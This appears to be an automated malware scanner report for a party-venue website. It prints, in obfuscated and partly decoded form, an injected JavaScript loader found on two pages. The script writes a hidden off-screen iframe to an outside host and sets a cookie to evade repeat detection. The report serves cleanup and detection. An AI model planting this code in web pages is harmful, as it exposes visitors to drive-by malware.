
Malware Scanner report for westernpartytown.com

Malicious/Suspicious/Total URLs checked
2/0/11
2 pages contain malicious code; see the details below.
Blacklists
OK
Malicious Redirects
OK
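Malicious/Hidden/Total iFrames
0/0/0
(Note: this count appears to cover only iframe tags present in the served HTML. The hidden iframe shown under "Scanned pages/files" below is written at page load by the obfuscated script via document.write, so it is not counted here.)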
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://www.westernpartytown.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:34 GMT
Location: http://westernpartytown.com/
Server: nginx
Content-Length: 178
Content-Type: text/html
clean
http://westernpartytown.com/
200 OK
Content-Length: 16635
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\
... 2024 bytes are skipped ...
105\x6Eab\154\145d|6\x30\x7C\156\141\166i\x67\x61t\157r|1\x35\65e|x6\x31|\x69n\144\145\170Of|\x31\x34\x32o\162|\1706\x38\x70|\x31\64\x37\157|\x78\x331|\170\67\x38|\x78\667|\1702\105c\x7C\x78\x32F\174\1703E\174x\x36\65x|\x78\67\x30\151\x7C1\66\62\x65\163|9\71\719\x399\x39\x7C\67\64|\170\661\155\x7Cx\x37\x34d\174x6\x46n\1741\66\62|\x74o\125\124\x43String|5\x37|\61\67\x30\x7C\170\67\x30\170\x7C\x315\x37\x70\174\65\65\174\170\666e\174\61\64\x37|x6\x43|\x78\66\63v|\61\660\174167'.split('\x7C'),0,{}))

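Decoded script (the output of the packed eval() loader above; its string literals are still hex/octal-escaped, and the final line is the iframe markup it writes into the page):

What it does: if cookies are enabled and no `__umtd=` cookie is present, it uses document.write to insert an iframe of random width and height (100–199 px), positioned off-screen with negative left/top offsets, pointing at the src URL shown in the last line. It then sets a `__umtd` cookie that expires after one day, so each browser receives the iframe at most once per day. A repeat visit from the same browser may therefore look clean; clear cookies when verifying a cleanup.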


var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1
... 981 bytes are skipped ...
162\143\x3D\x22\150\x74\164\x70\72\57/\167\160\142\x69\147\x66e\x63v\56\x6C\x6Fn\x67\x6D\165\163\151\143\x2Ec\157\155\x2F\151\x6E\144\145\x78\56\x70\x68p?\147o=\x31\"\x3E\74/\151\x66r\x61m\145>');document.cookie='\137\137\165\155\x74d='+Math.floor(Math.random()*9999999)+';\x20\x65x\x70i\162es\75'+exp.toUTCString()}
<iframe width="112" height="165" frameborder="0" style="position:absolute;left:-284px;top:-209px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe>

Antivirus reports:

Sophos
Mal/Iframe-AN

http://sm6.sitemeter.com/js/counter.js?site=sm6westpartytown
HTTP/1.1 302 Redirect
Date: Sat, 04 Oct 2014 20:05:37 GMT
Location: http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown
Server: Microsoft-IIS/6.0
Content-Length: 184
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown
200 OK
Content-Length: 7567
Content-Type: application/x-javascript
clean
http://www.westernpartytown.com/index.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:36 GMT
Location: http://westernpartytown.com/index.html
Server: nginx
Content-Length: 178
Content-Type: text/html
clean
http://westernpartytown.com/index.html
200 OK
Content-Length: 16645
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\
... 2024 bytes are skipped ...
105\x6Eab\154\145d|6\x30\x7C\156\141\166i\x67\x61t\157r|1\x35\65e|x6\x31|\x69n\144\145\170Of|\x31\x34\x32o\162|\1706\x38\x70|\x31\64\x37\157|\x78\x331|\170\67\x38|\x78\667|\1702\105c\x7C\x78\x32F\174\1703E\174x\x36\65x|\x78\67\x30\151\x7C1\66\62\x65\163|9\71\719\x399\x39\x7C\67\64|\170\661\155\x7Cx\x37\x34d\174x6\x46n\1741\66\62|\x74o\125\124\x43String|5\x37|\61\67\x30\x7C\170\67\x30\170\x7C\x315\x37\x70\174\65\65\174\170\666e\174\61\64\x37|x6\x43|\x78\66\63v|\61\660\174167'.split('\x7C'),0,{}))

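Decoded script (same loader as reported for http://westernpartytown.com/ above; the iframe width, height and offsets below differ from that sample because the script generates them with Math.random(), so detection should key on the iframe src host or the `__umtd` cookie name rather than on the dimensions):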


var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1
... 981 bytes are skipped ...
162\143\x3D\x22\150\x74\164\x70\72\57/\167\160\142\x69\147\x66e\x63v\56\x6C\x6Fn\x67\x6D\165\163\151\143\x2Ec\157\155\x2F\151\x6E\144\145\x78\56\x70\x68p?\147o=\x31\"\x3E\74/\151\x66r\x61m\145>');document.cookie='\137\137\165\155\x74d='+Math.floor(Math.random()*9999999)+';\x20\x65x\x70i\162es\75'+exp.toUTCString()}
<iframe width="185" height="145" frameborder="0" style="position:absolute;left:-251px;top:-225px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe>

Antivirus reports:

Sophos
Mal/Iframe-AN

http://westernpartytown.com/directions.html
200 OK
Content-Length: 9484
Content-Type: text/html
clean
http://westernpartytown.com/contact.html
200 OK
Content-Length: 11503
Content-Type: text/html
clean
http://westernpartytown.com/test404page.js
404 Not Found
Content-Length: 564
Content-Type: text/html
clean
http://www.westernpartytown.com/contact.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:39 GMT
Location: http://westernpartytown.com/contact.html
Server: nginx
Content-Length: 178
Content-Type: text/html
clean
http://www.westernpartytown.com/directions.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:40 GMT
Location: http://westernpartytown.com/directions.html
Server: nginx
Content-Length: 178
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: westernpartytown.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 04 Oct 2014 20:05:35 GMT
Pragma: public
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 05 Oct 2014 20:05:35 GMT
X-Page-Speed: 1.6.29.5-3346
Second query (visit from search engine):
GET / HTTP/1.1
Host: westernpartytown.com
Referer: http://www.google.com/search?q=westernpartytown.com

Result:
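The result is similar to the first query; no suspicious redirects were found. (This check compares server responses for the two requests only; the infection reported above is script injected into the page body, which a redirect check does not cover.)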

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=westernpartytown.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://westernpartytown.com/

Result: westernpartytown.com is not infected or malware details are not published yet.